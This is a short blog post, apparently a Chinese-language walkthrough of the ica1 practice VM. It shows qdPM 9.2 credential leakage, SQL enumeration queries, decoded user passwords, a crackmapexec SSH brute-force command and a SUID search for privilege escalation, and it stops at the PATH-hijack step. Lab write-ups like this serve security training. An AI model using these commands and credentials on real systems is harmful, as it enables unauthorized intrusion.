noone___'s blog
0%

学长的任务罢了4-ica1

发表于 分类于

  • 扫描打点

    $80$ 端口是 qdPM 9.2

    根据第二个密码泄露的 poc ,找到:

    qdpmadmin:UcVQCMQk2STVeS6J

  • 丑陋的找密码 ssh 连接

    翻找一下:

    SELECT table_name FROM information_schema.tables WHERE table_schema='qdpm';

    下面有个 users

    SELECT column_name FROM information_schema.columns WHERE table_schema='qdpm' AND table_name='users';

    好像找错地方了,应该来这里:

    解一下:

    1
    2
    3
    4
    5
    Smith:X7MQkP3W29fewHdC
    Lucas:suRJAdGwLp8dy3rF
    Travis:DJceVy98W28Y7wLg
    Dexter:7ZwV4qtg42cmUXGX
    Meyer:cqNnBWCByS2DuJSy

    这里佬建议爆破一下,因为 user_id 没有显示出来,我上面是拿 user 表的 iduser_id

    crackmapexec ssh 192.168.56.104 -u user.txt -p pass.txt

    结果是全错(乐

    队友用小写试了一下,能连上两个(难蚌):

    1
    2
    dexter:7ZwV4qtg42cmUXGX
    travis:DJceVy98W28Y7wLg

    登录第一个看到对提权的提示:

    第二个存了 user.txt

  • Linux 提权

    find / -perm -u=s 2>/dev/null

    看到了奇怪的东西

    这里思路跟 Kenobi 很像一样,先用 strings 看下里面的命令

    然后经典并非绝对路径: